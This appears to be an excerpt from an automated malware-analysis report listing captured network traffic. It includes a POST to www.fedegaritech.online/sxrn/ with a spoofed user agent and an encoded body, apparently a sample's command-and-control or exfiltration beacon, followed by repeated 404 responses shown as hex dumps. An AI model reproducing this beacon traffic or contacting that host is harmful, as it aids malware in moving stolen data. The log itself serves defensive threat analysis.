                Source: unknownHTTP traffic detected: POST /sxrn/ HTTP/1.1Host: www.fedegaritech.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencodedContent-Length: 204Connection: closeCache-Control: no-cacheOrigin: http://www.fedegaritech.onlineReferer: http://www.fedegaritech.online/sxrn/User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161Data Raw: 33 56 68 3d 32 32 49 58 76 47 44 66 4c 2b 33 7a 6f 45 47 70 49 71 73 75 68 45 79 59 6e 74 65 7a 4e 47 49 76 6e 45 50 72 62 74 77 75 51 53 5a 42 6e 37 4f 36 7a 4f 38 65 47 37 62 59 41 38 6a 44 6b 2f 50 5a 62 62 59 72 74 73 75 45 7a 47 4a 66 39 67 78 4e 67 34 7a 2f 4d 38 33 4a 6c 50 56 78 33 53 44 4f 67 4a 35 42 51 78 6f 65 6f 61 46 35 55 63 65 4f 54 51 30 6f 6c 63 42 41 35 46 70 4c 35 63 53 49 61 70 39 53 36 35 37 2b 4c 6d 32 51 39 51 69 55 76 30 79 52 71 78 41 78 30 70 54 62 39 4b 49 50 6c 52 64 49 38 41 42 4b 72 37 43 70 36 53 61 77 4c 6d 67 45 72 79 75 31 65 73 6f 79 6e 77 46 6d 45 33 79 6d 4f 72 63 3d Data Ascii: 3Vh=22IXvGDfL+3zoEGpIqsuhEyYntezNGIvnEPrbtwuQSZBn7O6zO8eG7bYA8jDk/PZbbYrtsuEzGJf9gxNg4z/M83JlPVx3SDOgJ5BQxoeoaF5UceOTQ0olcBA5FpL5cSIap9S657+Lm2Q9QiUv0yRqxAx0pTb9KIPlRdI8ABKr7Cp6SawLmgEryu1esoynwFmE3ymOrc=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:54:25 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:54:28 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:54:30 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:54:33 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:55:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:55:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:55:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:55:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:55:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-litespeed-tag: 3d9_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://tenmyk.shop/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HkunI7DZZ%2FqdJCgZNv95YCgaZuMrjcFlpnDSXFBAxX7vXbaTCd%2FDTxBG7V2EetXO7f4qxUP63pn1TNX5OJbcFihpCgzrW9rwuocCfToDH2EnoRijBYiXsBnoZo7N9nBjCRo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e481d4a0fe16c80-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1144&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=757&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 63 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 1a 69 73 9c 38 f6 f3 f8 57 60 5c d3 86 89 a0 a1 0f b7 4d 87 4c 66 72 ec 51 99 71 2a 4e 6a 6b cb 76 a5 d4 e8 41 cb 06 89 95 44 1f e9 e1 bf 6f 09 fa a0 0f c7 5e ef ce 3a 95 04 9e de ad 77 49 f8 e5 f1 db cb 37 9f ff f9 f1 9d 31 56 59 fa ea e8 a5 fe cf 48 31 4b 42 13 98 f3 e5 ca 34 72 01 31 9d 85 26 4f 02 63 ac 54 2e 83 76 9b 27 b9 9b 41 9b c9 13 d3 88 52 2c 65 68 a6 1c 13 ca 12 47 52 05 06 e3 ce 9d 34 35 3b c0 e4 d5 d1 0f 2f 33 50 d8 88 c6 58 48 50 a1 f9 e5 f3 7b e7 dc 34 da 7a 25 a5 ec de 10 90 86 66 2e 78 4c 53 30 8d b1 80 38 34 b5 ac a0 dd 4e b2 3c 71 b9 48 da b3 98 b5 Data Ascii: dc2is8W`\MLfrQq*NjkvADo^:wI71VYH1KB4r1&OcT.v'AR,ehGR45;/3PXHP{4z%f.xLS084N<qH
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:55:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 18:03:22 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HMnA4r2nXw6WlQpK8dbcV7253z3POErnGIEdYdJaDKXSJuoUByxnIFKx12Ou4g8YKXaQDPpDjCNwNKRhZGtKREBoBxmlZZQ0cL6lvFs%2BVhof4OoW2Yj67GrvYgLeMDPBgKrHrQmS9hVk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e481de6986e6b2f-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1640&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae c2 14 15 a1 89 7e 6c 39 45 f0 88 f1 d5 70 8f 72 32 39 3b 3d bb 88 a0 e4 26 97 2a 84 d3 61 b5 81 a1 fb f6 09 46 70 df e1 e1 70 7e fe 72 76 32 7f 9c 03 f4 49 ec 44 60 d4 8a b4 86 35 Data Ascii: 2c8To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2ID`5
